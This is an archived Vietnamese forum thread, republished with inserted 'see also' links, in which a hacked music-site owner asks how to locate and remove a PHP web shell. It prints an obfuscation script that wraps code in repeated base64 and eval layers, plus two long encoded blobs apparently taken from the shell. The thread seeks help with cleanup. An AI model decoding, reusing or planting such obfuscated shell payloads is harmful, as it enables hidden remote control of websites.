Làm sao xóa shell trên host vậy các bác? [Archive] – Diễn Đàn Tin Học

Tình hình là site em bị dính shell, bị chiếm quyền admin. Em có sử dụng code để search như sau:

if(isset($_POST[‘cmd’]) && isset($_POST[‘base64_encode(gzdeflate(‘]))
{
$code= $_POST[‘cmd’];
$code= “?>”.$code.” for($i=0;$i<21;$i++)
{
$code= base64_encode(gzdeflate($code));
$code =”?> }
echo base64_encode(gzdeflate($code));
}
else if(isset($_POST[‘cmd’]) && isset($_POST[‘gzinflate(base64_decode(‘]))
{
echo gzinflate(base64_decode($_POST[‘cmd’]));
}
else if(isset($_POST[‘cmd’]) && isset($_POST[‘base64_encode(‘]))
{
$code= $_POST[‘cmd’];
for($i=0;$i<6;$i++)
{
$code= base64_encode($code);
$code =”eval(decode_base64(‘”.$code.”‘))”;
}
echo base64_encode($code);
}
else
echo ‘

<---------------->

‘;
?>

Sau khi chạy thì nó ra thế này
http://cC0.upanh.com/23.470.30526059.3430/shell.jpg

Nhấp vô các button thì nó hiện ra cái code đã mã hóa. Vậy làm sao biết nó nằm ở đâu và xóa như thế nào? Xin các bác chỉ giáo. Thanks

Bạn đang đọc: Làm sao xóa shell trên host vậy các bác? [Archive] – Diễn Đàn Tin Học

exciterdown hàng loạt code về máy tính. Dùng chương trình antivirut mới nhất nó sẽ phát hiện giúp bạn. Mình hay dùng Avira Antivirus
kiemtienpro

Bác cho cái code mã hóa kia vào đây giải mã, ra cái gì paste lên đây tính tiếp

http://www.tareeinternet.com/scripts/decrypt.php

SunOfTheBeachcái script này chỉ để chạy lệnh đc truyền vào từ cái form thôi. Xóa nó đi là hết
dung_la_chet

down toàn bộ code về máy tính. Dùng chương trình antivirut mới nhất nó sẽ phát hiện giúp bạn. Mình hay dùng Avira Antivirus
Em down về quét rồi mà ko thấy gì bác ạ.

Bác cho cái code mã hóa kia vào đây giải mã, ra cái gì paste lên đây tính tiếp
Đoạn code đó đây các bác ạ, em decode đi decode lại mà ko đc, các bác xem giúp em với

ZXZhbChkZWNvZGVfYmFzZTY0KCdaWFpoYkNoa1pXTnZaR1ZmWW 1GelpUWTBLQ2RhV0Zwb1lrTm9hMXBYVG5aYVIxWm1XVzFHZWxw VVdUQkxRMlJoVjBad2IxbHJUbTloTVhCWVZHNWFZVkl4V20xWF Z6RkhaV3h3VlZkVVFreFJNbEpvVmpCYWQySXhiSEpVYlRsb1RW aENXVlpITldGWlZrbDRWMjB4V0ZaNlJraGFWM2gzVmxaa1ZWRn JlRkpOYkVwdlZtcENZV1F5U1hoaVNFcFZZbFJzYjFSV2FFTlhW bHBJVGxkR1dsWnJiRFJXTWpCNFYwWmFObEpyYUdGV00yZ3pWbX hhYTFaV1JuSmxSa3BPWVhwVmVGWlljRWRVTWs1elVXeFNXazB3 U2sxV1ZsRjNUMVZ3TldFelFXNUxVMnM5SnlrcCcpKQ==

FZZHrq2IAQW30rP+XwyAS1bb/iLnnJlY5HjJefV+3sJRqer8+c+//vxVnunwq37bsRrSvfyVpVuJo/8tynwqyl9/c0kirYst03V4Qutx8PVBQuQNscmOctewhWN3WmlZVag59qwGge f7Ii8FCmHlgvhaJu1LJCwFzPkQ8kYLlolglJW0Zi9qzlJwy0vW et+a4hYeVxmg1Vyi3Co35JMBL10/hZzveKXzaJyHfzc6n5eruZkIb78MXFptNse027Er87gcsHoEWz q83GTlrVNKka92gLhCo8cFnCFP1Zro+PUhBcrJ5EsJhXLt1PdA O0sbkogo6IEgQ+6jWE0TK0VPPtKwDIakvvcIJni27kNRFCCbzV pxSGrySaWUyHgWtNa4jlX23X0E1Y3m07SD40AAcCU8MMPZumi6 eDuDnQ98Nlj5hru4DiUcOFJqzJeRyJk2CjvYZhWVFb0Wi0bxdX 7reFhRkur7cp+1KMehqBhSM240Bp3qTUL5515vSH3gIQLWDzTa uWAUOh62OKtyG5ZbgYzFad5Gee2V0c6/iVBtDrLuLLc5dKd2oMbfgYnvk+gGg8ZNkJctaySYBmUhqXRu08 cAEvKeAdNvGMyS9soAi445zUY+ypfGA06uMn5zdDB61y4JIExW BzGIl5xH48K5Iw0XnvZBt0NaSxwnRx0ahvgG8l6Kox7zceEaTy 4/gyD8vLtbx3qDGY5v20D1aovIHb6fDyOr2XVSC2be7aQP6CLwci SJBC/Ff3NFr6mSzcHbx2MW9H0fc3PkVLb2xWPFAVVViMFeU8xoWvX9j eLuC7h+RgMIVSNlANTfoNIzGhx18OpmWwem6kDPmXYL3ypqtql iPSzpOq4Xg3mPoy6rZVIVB0OoiffqY7HOVOwsy+uww9AYzbULG nU/c81Q+9iIPP9RLrTYXABMwmsiSLb0XTxT4myAFQRKOddICkeq2u eS00V7zHAOItEQma45s3KzPs/ZtEHOlEQOVkj5bT+qOnM7YzVDyvumJbTUlGtaJWcOSW/6PODSHV9SAcPmp7TYuoe9yWG93LjIaVDTItSa2G+Nenp6Il+Gh 8vMdcBc9VKye8xGiomhK0252qit8fOo6A7NYk+Bnb17ixAHEEK fecLBUfrIubneiRKosA/vrrbjehxC+t1793dgbU+YUxasG1flPRwvNekNiewHAgxqJGvRM vh+MQaKhh/8BbsyYJUoI6KbutZVlZfUsLNVgoX7SnGDY74/ktsCfJL5NcYcFQB+9SfkwvYo/xGMGngBkrvjxXozkq7l+4NfxfL36hlSKED7NoUI6YfCXh4Qx59 DyHy6p9F0qD1jNt2Nl2pjzaOXOnUuuSUro4ltefDTUFhKeFmeo TZP+ilQqYZuc9/xbvEZ9eMmpP0icvKCdcrcPDKuRtumfC/vIhOICXIlAH01y4uD3I+PnNQSN8OaEeOZAdR1eNrVnY+8Kzv7h kKvRgFXPP40OKJRhIcsQLJV6z9j5S6h3Tk7jR7LyKfxKeoR/c6ntFk3KlTMugiNJKJeRTnZ4OQ0ZOkL3RUiHkdkrPIQo8UAX9L NoSn2QVSOLw2WY13PZcYOp3m2Z5CyTaP6wNVR8b3LxVsu4YVGM IikgC0EGFsDBKLcdkBa7KUUApYwWKFKla7km+QN1c5uxNLK1Lo QaRdmdnrEItFiMXIJR/06RR0vAWlWaZfHAxt22RMoIPejTc4J5GfW+y+TJhbx5B9VCSMx 9RP+ayl35PjrIuGTbuZui44rLouINOPyjBxPc4bTdugUTPO4xE lelQD4dnQKGeRc5MTijGkxHPXaTlZiC9Yz/sSAa/bki4jv5OFA/gWS+rF6oFIha4ynfT0Jr6kmC29KlQQAlXbmMX6ha+UKtDmtSCh/EjdbtYgMh9lZ4kkpuVRzbBadFKRznZByu1XcEyNFE3NJQ4J13/YkGo/ewoOtOHAz4e8B77yBpox9LP6GvwBDd3ufOcSTtmKfoZR5IHjDJ n4xW1XWTTbw+THq6bNlsHVz5cXkAzz39wNkcutmtIajeO89/JFbpondZ+lJ5NEr/gDATcHvsQ/qZ/7TGhIJz3C2a3Y9AWSMEWoDx1GD5Z015wSQKTk1CJcBTRkBd79x daK75n1H3VDu5Mm9KyxxJ9CuUkSvPDTrozJk7hacjdEl6FAgGP 7DtpeEfPm4ax/1sy6V9fy/ERF9pY+jr23dswo6urtMs7IMmmlIs+szgSBCAWB1guALY0Dugw z5779///79z19/fo7I/wA=

cái script này chỉ để chạy lệnh đc truyền vào từ cái form thôi. Xóa nó đi là hết
Vấn để chính là em ko biết nó nằm chỗ nào bác ạ :”>

[=========> Bổ sung bài viết <=========] Ặc, cái đoạn code thứ 2 cái chỗ mặt cười là chữ l ol các bác ạ

imchicken

Xem thêm: Mã Hóa End-To-End (E2EE) Là Gì? | Binance Academy

bác dùng gì nếu wp themes thì đưa đây .
dung_la_chetThanks bác, nhưg em ko dùng WP bác ạ
lefuong

bác cần người khác giúp thì phải nói rỏ ràng ra chứ, ở đây có nhiều cao thủ giúp bạn lắm.
p/S: trước tiên là down về máy rồi dùng những phần mềm quét virus tốt nhé

excitertìm trong những file plugin của host nhé bro .
dung_la_chet

Thanks các bác. Site em là site nhạc, sử dụng mã nguồn Xtramedia, do có 1 số logo site gà của anh em, bạn bè trên đó nên e ko dám show :D.
Cũng khổ :(, gặp nạn mà nhờ vả cũng sợ, ko nhờ thì ko đc, mà public thì ko dám :(. Thanks các bác đã giúp, có lẽ em tự mò vậy :(. Có cái site bé tí mà cả nửa năm nay bị dính đủ thứ 🙁

Xem thêm: Lịch sử Internet – Wikipedia tiếng Việt

quockhoipro

Thanks các bác. Site em là site nhạc, sử dụng mã nguồn Xtramedia, do có 1 số logo site gà của anh em, bạn bè trên đó nên e ko dám show :D.
Cũng khổ :(, gặp nạn mà nhờ vả cũng sợ, ko nhờ thì ko đc, mà public thì ko dám :(. Thanks các bác đã giúp, có lẽ em tự mò vậy :(. Có cái site bé tí mà cả nửa năm nay bị dính đủ thứ 🙁

gỡ logo ra và show lên đây

Powered by vBulletin ® Version 4.2.0 Copyright © 2023 vBulletin Solutions, Inc. All rights reserved .

Source: https://thomaygiat.com
Category : Kỹ Thuật Số